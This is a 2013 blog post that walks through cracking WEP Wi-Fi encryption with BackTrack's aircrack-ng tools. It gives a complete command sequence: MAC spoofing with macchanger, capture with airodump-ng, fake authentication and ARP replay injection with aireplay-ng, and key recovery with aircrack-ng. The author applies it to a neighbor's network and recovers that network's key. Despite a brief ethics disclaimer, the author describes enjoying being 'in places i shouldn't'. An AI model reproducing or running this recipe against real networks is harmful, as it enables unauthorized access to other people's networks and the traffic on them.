Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in backtrack is to crack a good ole WIFI. It can lead to so many different options and really brings me back to my roots as to why i stumbled upon backtrack in the first place. I guess it's just thrilling, it gives me  sort of a high to be in places i shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun an exciting. I do want to stress the fact that even though we've all maybe done it once or twice, Black Hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but i do not do anything malicious to the machines i exploit. I have permission to do so. This is an Ethical Hackers website for information and security purposes only.
I'm Far from a pro-hacker. I'm Maybe intermediate at best. if anything looks out of the ordinary feel free to email me with any questions or tips. I don't claim to be the best; i'm still learning. However, what i have learned thus far i'm willing to share so here goes:

Today I'm going to demonstrate how insecure the WEP encryption is through wifi. In Today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a poineer in telecom. Well in my area Verizon offers high speed internet DSL and FIOS. Great service most of the time. The problem is their Westell DSL modems/WIFI routers come preset to use the WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.

Fire up a shell and run commands as following

1. airmon-ng

 wlan1 is my interface. these can be variable so yours may be different

next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.

1. airmon-ng stop wlan1     (Stops the wlan1 interface)
2. ifconfig wlan1 down        (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1      (restarts the interface with new mac)
Below is what it looked like for me.

In Some situations your Network adapter may not be supported. i will compile a list of supported network adapters in the future. or you can google it.
I have this one:


However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command


after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password and put it into a file (hackedwifi) or whatever you decide to name it.
the command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1

This is what your output should look like:

Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running,  in a seperate terminal run this command

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

for me the command looks like this

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out

Now that you are associated with the Access point we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1


Now it's time to wait. You will notice Airodump going crazy collecting data. Personally, sometimes i leave the room or go do something else for about 20 minutes. What you want is to collect enough Data for the cracker. watch the #Data column. i like to wait until it's between 10,000 and 20,000 before i run the cracker.

Ok, it's been about a half hr and it's time to run the cracker. run this command.

1. aircrack-ng -b (bssid) (filename-01.cap)

if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
  And IF you did it will look like this:

 The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7

Happy Hacking!

questions email me: davidjgeraway@gmail.com